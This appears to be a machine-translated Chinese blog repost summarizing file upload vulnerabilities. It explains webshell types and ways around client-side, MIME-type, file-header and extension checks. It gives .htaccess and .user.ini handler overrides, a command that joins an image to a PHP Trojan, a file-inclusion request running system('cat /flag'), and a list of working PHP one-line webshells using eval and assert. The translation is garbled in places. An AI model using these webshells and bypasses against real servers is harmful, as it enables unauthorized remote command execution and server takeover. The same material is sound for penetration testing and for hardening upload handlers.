当前位置：网站首页>File upload vulnerability summary

During development, the files uploaded by users were not strictly detected , Filter , As a result, users can upload executable script files ( Malicious files ), As a result, the server commands can be executed

harm

Get control of the server

You can upload a file with the same file name to overwrite the original file

Vulnerable to directory traversal ;

Denial of service (DoS) attack ....

webshell（ Web Trojan file ）

The most common method of file upload vulnerability is to upload website Trojan horse （webshell） file ,WEBSHELL Also known as web Trojan file , According to different development languages, it can be divided into ASP Trojan horse 、PHP Trojan horse 、JSP Trojans, etc , This kind of Trojan horse uses the system command execution in the scripting language 、 Functions such as file reading and writing , Once uploaded to the server, it is parsed by the script engine , The attacker can control the server .

webshell Divided into Malaysia , The pony （ In a word, Trojans ） And pictures of horses

Malaysia

The functions are quite complete , But the amount of code is large , Relatively complex , Not easy to hide , Generally, encryption and other means are needed to hide

The pony

Simple function , Less code , Strong concealment

Picture horse

The website only allows uploading pictures (.png .jpg .gif) , And cannot be bypassed , Use pictures of horses

Make pictures of horses ：cmd Enter command in ：copy picture .jpg/b+ Trojan horse .php/a picture .jpg

Catalog

Catalog

principle

harm

webshell（ Web Trojan file ）

Malaysia

The pony

Picture horse

Front end validation （ client javascript verification ）

Front end validation bypasses

Back-end verification （ Server side validation ）

Server side MIME Type validation （ File content type detection ）

Server side file content verification - The file header

Server side file extension verification

Commonly used

.htaccess

.user.ini

A common sentence is written

Front end validation （ client javascript verification ）

Mainly detect the file suffix , Roughly divided into ：

The blacklist ： Uploaded files are not allowed
White list ： Files allowed to be uploaded

When the front end has restrictions on uploading files, you can directly modify the code

eg:  lay-data="{url: 'upload.php', accept: 'images',exts:'png'}
       Change it to ：lay-data="{url: 'upload.php', accept: 'file'}

Front end validation bypasses

Turn off in browser settings Javascript
bp Grab the bag to modify （ For example, upload first 1.jpg file , Then grab the bag and change it to 1.php

Back-end verification （ Server side validation ）

Server side MIME Type validation （ File content type detection ）

MIME The type is to describe the message Internet standards for content types

Mainly for Content-Type：

When there are restrictions on the contents of the file , Can be Content-Type：application/octet-stream And so on ：

Content-Type：image/jpeg

Content-Type：image/png

Content-Type：image/gif

Server side file content verification - The file header

The backend will detect the content of the uploaded file

The image format checks the file content by checking the binary at the beginning of the file , Different picture types , File headers are different .

Bypass method ：

One , Add a file magic header before the file , Cheat on image content

Common file magic head ：GIF89a

JPG: FF D8 FF EO 00 10 4A 46 49 46.
GIF:47 49 46 3839 61(GIF89a).
PNG:89 50 4E 47

Two , Use the server to parse the Trojan file into a picture file , Therefore, when sending a request to execute the file , The server will only return this “ picture ” file , The corresponding command will not be executed .

Therefore, exploit File Inclusion Vulnerability , You can treat a file in picture format as PHP File to parse and execute

.php?filename=uploads/1.jpg&pass=system('cat /flag')

Server side file extension verification

.php?filename=uploads/1.jpg&pass=system('cat /flag')

The extension of the file is filtered by the back end , The uploaded file suffixes are filtered

Bypass method ：

Suffix case
Synonymous suffix replacement

php: php、 phtml、php3、php4、php5  

jsp: jap、jspx、jspf 

asp: asa、cer、aspx

ext: exee

Double writing bypasses ：php -> phphpp

Commonly used

.htaccess

Reference resources ： Link to the original text ： Delve into user utilization .htaccess Security problems caused by tampering with configuration _ Hetian Wangan College -CSDN Blog

.htaccess file ( perhaps " Distributed profile "）, The full name is Hypertext Access( Hypertext entry ). Provides a way to change the configuration for the directory , namely , Place a file containing one or more instructions in a specific document directory , To apply to this directory and all its subdirectories . As the user , The commands available are limited . Administrators can use the Apache Of ''AllowOverride'' Command to set . Here is a brief introduction ,.htaccess To put it bluntly apache A profile in the server ; It is only responsible for the configuration of web pages under relevant directories ;

htaccess The function of documents ：

Webpage 301 Redirect
Customize 404 Error page
Change the file extension
Prohibit directory lists, etc

So you can use write .htacess The contents of the document ：

<FilesMatch "s1mple"> // Make the name s1mple File as php Format parsing 
Sethandler application/x-httpd-php
</Filesmatch >
    
  perhaps ：
AddType application/x-httpd-php .jpg // take jpg The document serves as php Format parsing

.user.ini

Reference resources ： File upload .htaccess and .user.ini_m0_46587008 The blog of -CSDN Blog

.user.ini. It is better than .htaccess More widely used , Whether it's nginx/apache/IIS, As long as it is with fastcgi Running php You can use this method .

.user.ini The function of documents ： You can change the permissions of users to read files and include files , It's more widely used , But one more condition ( More important ) There are executable files in the corresponding directory . Next, let's look at how to construct these two configuration files .

auto_prepend_file=a.jpg // Pass in front of the Trojan horse 
auto_append_file=a.jpg  // Pass in after the Trojan horse

A common sentence is written

 <?php @eval($_POST["pass"]);?> 

<script language='php'>assert($_REQUEST['pass'])</script>
     
<script language="php">eval($_POST['pass'])</script>
                                   
<scriptlanguage="php">eval($_REQUEST['pass'])</script>

原网站

版权声明
本文为[-*Xiao Kai]所创，转载请带上原文链接，感谢
https://yzsam.com/2022/02/202202130746001359.html